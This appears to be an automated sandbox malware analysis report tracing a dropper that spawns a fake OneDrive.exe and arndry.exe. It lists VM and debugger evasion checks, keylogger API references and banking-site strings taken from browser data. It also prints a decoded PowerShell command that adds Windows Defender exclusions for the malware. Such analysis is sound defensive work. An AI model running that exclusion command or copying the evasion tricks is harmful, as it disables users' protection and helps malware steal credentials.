                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\Documents\OneDrive.exeProcess information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: Process Memory Space: b39wW3jYKO.exe PID: 6412, type: MEMORYSTR
                        Check if machine is in data center or colocation facility
                        Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
                        Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: b39wW3jYKO.exe, 00000000.00000002.4618510904.00000141820D1000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 00000008.00000002.2577826782.00000129591E0000.00000004.00000800.00020000.00000000.sdmp, arndry.exe, 00000009.00000002.2501821797.000000000239D000.00000004.00000800.00020000.00000000.sdmp, OneDrive.exe, 0000000E.00000002.2653178477.0000019A26E51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                        Source: arndry.exe, 00000009.00000000.2419775202.00000000001D2000.00000002.00000001.01000000.00000009.sdmp, arndry.exe.0.drBinary or memory string: SBIEDLL.DLLINFO
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeMemory allocated: 14180770000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeMemory allocated: 1419A0D0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeMemory allocated: 12958EB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeMemory allocated: 129710E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeMemory allocated: 21E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeMemory allocated: 1A390000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeMemory allocated: 19A26DC0000 memory reserve | memory write watch
                        Source: C:\Users\user\Documents\OneDrive.exeMemory allocated: 19A3EE50000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeWindow / User API: threadDelayed 6976Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeWindow / User API: threadDelayed 2847Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5663Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4140Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exe TID: 1016Thread sleep count: 43 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exe TID: 1016Thread sleep time: -39660499758475511s >= -30000sJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exe TID: 1924Thread sleep count: 6976 > 30Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exe TID: 1924Thread sleep count: 2847 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 884Thread sleep time: -5534023222112862s >= -30000sJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exe TID: 5648Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exe TID: 6068Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\Documents\OneDrive.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Windows\SYSTEM32\MSVFW32.dllJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Windows\SYSTEM32\en-US\avicap32.dll.muiJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\Jump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Windows\SYSTEM32\en-US\MSVFW32.dll.muiJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeFile opened: C:\Windows\system32\wbem\en-US\wmiutils.dll.muiJump to behavior
                        Source: Amcache.hve.12.drBinary or memory string: VMware
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: discord.comVMware20,11696487552f
                        Source: Amcache.hve.12.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: www.interactivebrokers.comVMware20,11696487552}
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: ms.portal.azure.comVMware20,11696487552
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: global block list test formVMware20,11696487552
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: tasks.office.comVMware20,11696487552o
                        Source: Amcache.hve.12.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: AMC password management pageVMware20,11696487552
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: interactivebrokers.comVMware20,11696487552
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: dev.azure.comVMware20,11696487552j
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: microsoft.visualstudio.comVMware20,11696487552x
                        Source: Amcache.hve.12.drBinary or memory string: vmci.sys
                        Source: arndry.exe.0.drBinary or memory string: vmware
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: netportal.hdfcbank.comVMware20,11696487552
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: trackpan.utiitsl.comVMware20,11696487552h
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: outlook.office365.comVMware20,11696487552t
                        Source: Amcache.hve.12.drBinary or memory string: VMware20,1
                        Source: OneDrive.exe, 0000000E.00000002.2653178477.0000019A26E51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SerialNumber0VMware|VIRTUAL|A M I|XenDselect * from Win32_ComputerSystem
                        Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
                        Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
                        Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                        Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                        Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                        Source: Amcache.hve.12.drBinary or memory string: VMware PCI VMCI Bus Device
                        Source: OneDrive.exe, 0000000E.00000002.2653178477.0000019A26E51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: model0Microsoft|VMWare|Virtual
                        Source: Amcache.hve.12.drBinary or memory string: VMware VMCI Bus Device
                        Source: Amcache.hve.12.drBinary or memory string: VMware Virtual RAM
                        Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                        Source: Amcache.hve.12.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696487552
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: secure.bankofamerica.comVMware20,11696487552|UE
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: account.microsoft.com/profileVMware20,11696487552u
                        Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
                        Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin
                        Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: bankofamerica.comVMware20,11696487552x
                        Source: Amcache.hve.12.drBinary or memory string: VMware20,1hbin@
                        Source: Amcache.hve.12.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                        Source: Amcache.hve.12.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.12.drBinary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
                        Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552
                        Source: Amcache.hve.12.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                        Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                        Source: b39wW3jYKO.exe, 00000000.00000002.4644423945.000001419AC09000.00000004.00000020.00020000.00000000.sdmp, arndry.exe, 00000009.00000002.2503320475.000000001B185000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: interactivebrokers.co.inVMware20,11696487552d
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: Interactive Brokers - HKVMware20,11696487552]
                        Source: Amcache.hve.12.drBinary or memory string: vmci.syshbin`
                        Source: Amcache.hve.12.drBinary or memory string: \driver\vmci,\driver\pci
                        Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696487552~
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696487552^
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696487552p
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696487552n
                        Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: outlook.office.comVMware20,11696487552s
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696487552
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: turbotax.intuit.comVMware20,11696487552t
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552x
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: Canara Transaction PasswordVMware20,11696487552}
                        Source: tmpA901.tmp.dat.0.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696487552
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

                        Anti Debugging

                        barindex
                        Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeCode function: 9_2_00007FFD34687791 CheckRemoteDebuggerPresent,9_2_00007FFD34687791
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\arndry.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        .NET source code references suspicious native API functions
                        Source: b39wW3jYKO.exe, SchemaTagBridge.csReference to suspicious API methods: ((Application)P_0).TryFindResource(P_1)
                        Source: arndry.exe.0.dr, Messages.csReference to suspicious API methods: capGetDriverDescriptionA(wDriver, ref lpszName, 100, ref lpszVer, 100)
                        Source: arndry.exe.0.dr, XLogger.csReference to suspicious API methods: MapVirtualKey(vkCode, 0u)
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, NativeMethods.csReference to suspicious API methods: OpenProcessToken(hProcess, desiredAccess, out var TokenHandle)
                        Source: 0.2.b39wW3jYKO.exe.1419afb0000.0.raw.unpack, ResourceReferenceValue.csReference to suspicious API methods: NativeMethods.LoadLibrary(ResourceFilePath)
                        Encrypted powershell cmdline option found
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\engineer\Desktop\b39wW3jYKO.exe; Add-MpPreference -ExclusionProcess C:\Users\engineer\Desktop\b39wW3jYKO.exe;Add-MpPreference -ExclusionPath C:\Users\engineer\documents\OneDrive.exe; Add-MpPreference -ExclusionProcess C:\Users\engineer\documents\OneDrive.exe
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeProcess created: Base64 decoded Add-MpPreference -ExclusionPath C:\Users\engineer\Desktop\b39wW3jYKO.exe; Add-MpPreference -ExclusionProcess C:\Users\engineer\Desktop\b39wW3jYKO.exe;Add-MpPreference -ExclusionPath C:\Users\engineer\documents\OneDrive.exe; Add-MpPreference -ExclusionProcess C:\Users\engineer\documents\OneDrive.exeJump to behavior
                        Found direct / indirect Syscall (likely to bypass EDR)
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtQueryValueKey: Direct from: 0x7FFD93C9869FJump to behavior
                        Source: C:\Users\user\Desktop\b39wW3jYKO.exeNtDeviceIoControlFile: Direct from: 0x7FFD34BBCF44Jump to behavior
